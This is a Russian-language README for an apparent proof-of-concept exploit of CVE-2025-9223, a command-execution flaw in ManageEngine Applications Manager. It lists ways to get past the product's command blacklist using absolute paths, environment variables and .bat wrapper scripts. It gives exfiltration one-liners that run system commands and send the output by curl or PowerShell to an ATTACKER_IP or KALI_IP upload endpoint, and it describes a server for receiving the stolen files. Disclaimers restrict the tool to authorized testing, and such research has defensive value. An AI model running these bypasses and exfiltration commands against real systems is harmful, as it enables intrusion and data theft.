
PoC для CVE-2025-9223
Этот репозиторий содержит концептуальную проверку (PoC), демонстрирующую уязвимость выполнения команд в функции "Execute Program Action" в ManageEngine Applications Manager.
Applications Manager использует чёрный список (BlackListCommands) для блокировки опасных команд, но валидация имеет критические недостатки:
| Метод | Пример |
|---|---|
| Абсолютный путь | C:\Windows\System32\netstat.exe |
| Переменные окружения | %SystemRoot%\System32\netstat.exe |
| Скрипт-обёртка | echo netstat > a.bat && a.bat |
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload
Скрипт upload_server.py предоставляет простой HTTP-сервер для приёма эксфильтрированных файлов.
python3 upload_server.py
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads
--host: Адрес привязки (по умолчанию: 0.0.0.0)--port: HTTP-порт (по умолчанию: 8000)--dir: Каталог вывода (по умолчанию: текущий каталог)✅ Защита от path traversal
✅ Уникальные имена файлов с временной меткой
✅ Регистрация запросов с IP и User-Agent
✅ Проверка типа содержимого
Создайте файл test_commands.txt с примерами обхода:
# Обход с абсолютным путём
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an
# Обход с переменными окружения
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe
# Обход со скриптом-обёрткой
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat
# Примеры эксфильтрации данных
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"
ВАЖНО: Этот инструмент предоставляется исключительно в образовательных целях и для авторизованного тестирования.
❌ НЕ используйте на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения
❌ НЕ используйте для любых незаконных действий
✅ ИСПОЛЬЗУЙТЕ только в контролируемых средах для исследований в области безопасности
✅ ПОЛУЧИТЕ соответствующее разрешение перед проведением тестов
Автор не несёт ответственности за любое неправомерное использование этого инструмента. Пользователи берут на себя всю ответственность и риск.
Этот проект предназначен только для исследовательских и образовательных целей. Все права защищены.
Johan Aybar - В образовательных целях
⚠️ НАПОМИНАНИЕ: Этот PoC должен использоваться только в авторизованных тестовых средах. Несанкционированное использование может быть незаконным и строго запрещено.
| Метод | Endpoint | Описание |
|---|
| GET | / | Список недавно загруженных файлов |
| POST | /upload | Загрузка файлов (multipart/form-data) |
| PUT | /upload/[filename] | Прямая загрузка файлов |